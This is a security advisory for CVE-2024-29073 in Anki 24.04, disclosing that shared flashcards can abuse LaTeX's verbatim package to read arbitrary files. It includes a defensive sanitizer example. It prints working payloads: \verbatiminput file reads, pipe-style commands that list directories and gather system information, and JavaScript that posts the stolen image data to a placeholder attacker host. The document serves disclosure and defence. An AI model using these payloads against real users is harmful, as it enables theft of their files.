CVE-2024-29073
A vulnerability in the handling of LaTeX exists in Ankitects Anki 24.04. When LaTeX is sanitized to prevent unsafe commands, the verbatim package, which comes installed by default in many LaTeX distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Ankitects Anki 24.04
Anki - https://apps.ankiweb.net/
5.3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-829 - Inclusion of Functionality from Untrusted Control Sphere
Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).
Anki offers users the option to publicly share their decks, and it is normal behaviour to use them; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.
Anki uses LaTeX to show images or other TeX models in the flashcards. This requires a LaTeX handler to be installed; for Windows, the Anki documentation suggests users install MiKTeX. There are some TeX commands that allow actions a flashcard should not be able to perform, such as reading or writing files.
Anki has a blocklist preventing the use of commands that read file descriptors, but the verbatim package command seems to have been overlooked (the package comes bundled with all LaTeX distributions).
An attacker using a specially crafted card header section such as the following:
\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}
can load the verbatim package and further abuse its functionality.
Using the verbatiminput command inside the card body, an attacker can perform the following operations:
For arbitrary file read:
[latex]\verbatiminput{PATH_TO_FILE}[/latex]
For system information:
[latex]\verbatiminput{|texosquery-jre8 -o -r -a -l}[/latex]
Or for listing directories / files:
[latex]\verbatiminput{|kpsewhich ~/*}[/latex]
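The root cause above is a blocklist that did not know about the verbatim package. As an added example (not Anki's code, and not the vendor's patch), the checker below shows the two controls a defender would want in a card sanitizer: an allowlist of packages the header may load, plus a blocklist of file-reading commands that includes \verbatiminput and a check for pipe-style arguments. The blocked-command set beyond \verbatiminput is an assumption (standard TeX file-reading primitives), and the sample cards are constructed from the snippets in this advisory.

```python
import re

# Constructed example for this advisory, not Anki's own sanitizer.
# Blocklist of file-reading / external-input commands. The advisory's gap was
# \verbatiminput (from the verbatim package); the other entries are assumed.
BLOCKED_COMMANDS = {"input", "include", "openin", "read", "write18",
                    "verbatiminput"}
# Allowlist: only the packages the card header legitimately needs, so a new
# package (like verbatim) is rejected by default instead of slipping through.
ALLOWED_PACKAGES = {"inputenc", "amssymb", "amsmath"}

USEPACKAGE_RE = re.compile(r"\\usepackage(?:\[[^\]]*\])?\{([^}]*)\}")
COMMAND_RE = re.compile(r"\\([A-Za-z@]+)")
PIPE_ARG_RE = re.compile(r"\{\s*\|")  # {|cmd ...}: argument opened with a pipe


def check_latex(src: str) -> list[str]:
    """Return a list of findings; an empty list means the snippet passes."""
    findings = []
    for m in USEPACKAGE_RE.finditer(src):
        for pkg in m.group(1).split(","):
            pkg = pkg.strip()
            if pkg and pkg not in ALLOWED_PACKAGES:
                findings.append(f"package not allowlisted: {pkg}")
    for m in COMMAND_RE.finditer(src):
        if m.group(1) in BLOCKED_COMMANDS:
            findings.append(f"blocked command: \\{m.group(1)}")
    if PIPE_ARG_RE.search(src):
        findings.append("argument begins with a pipe")
    return findings


# Constructed inputs: the header from the advisory, a benign card, a hostile one.
HEADER_WITH_VERBATIM = r"""\documentclass[12pt]{article}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\begin{document}"""
BENIGN_CARD = r"[latex]$\sqrt{x^2+1}$[/latex]"
HOSTILE_CARD = r"[latex]\verbatiminput{|kpsewhich ~/*}[/latex]"

if __name__ == "__main__":
    for name, src in [("header", HEADER_WITH_VERBATIM),
                      ("benign", BENIGN_CARD), ("hostile", HOSTILE_CARD)]:
        print(name, check_latex(src) or "ok")
```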
The attacker can read the result of the rendered tags by exploiting the fact that the rendered content is inserted into the HTML document as an img element with the class latex (selector “img.latex”). With this knowledge, we can add appropriate JavaScript code to the card template.
const latex_image = document.querySelector("img.latex").getAttribute("src");
fetchFileAndConvertToBase64(`http://${window.location.hostname}:${window.location.port}/${latex_image}`).then(base64Data => postBase64ToUrl(`http://${REPLACE_HOST_HERE}/upload`, base64Data))
which will obtain the img.latex content and send it to an attacker-controlled server.
2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release
Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.